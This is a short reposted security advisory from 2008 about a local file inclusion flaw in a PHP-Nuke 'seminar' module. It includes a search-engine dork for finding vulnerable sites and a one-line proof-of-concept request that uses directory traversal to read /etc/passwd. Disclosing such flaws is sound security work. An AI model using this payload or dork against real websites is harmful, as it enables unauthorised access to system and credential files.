Computer Security

Security Advisory: PHP-Nuke Module "seminar" Local FIle Inclusion
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHP-Nuke Module eGallery "pid" Remote SQL Injection

  [ GLSA 200803-06 ] SWORD: Shell command injection

From:no-reply_(at)_aria-security.net <no-reply_(at)_aria-security.net>
Date:04.03.2008
Subject:PHP-Nuke Module "seminar" Local FIle Inclusion

Aria-Security Team (Persian Security Network)
http://Aria-Security.net
-----------------------------------------------
Shoutz: AurA, Null, Kinglet, imm02tal And all our staff
PHP-Nuke Module "seminar" Local FIle Inclusion
Original Advisory: http://forum.aria-security.net/showthread.php?p=1591

Hint:inurl:"modules.php?name=seminar"

PoC
modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../..
/etc/passwd

Regards,
The-0utl4w
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru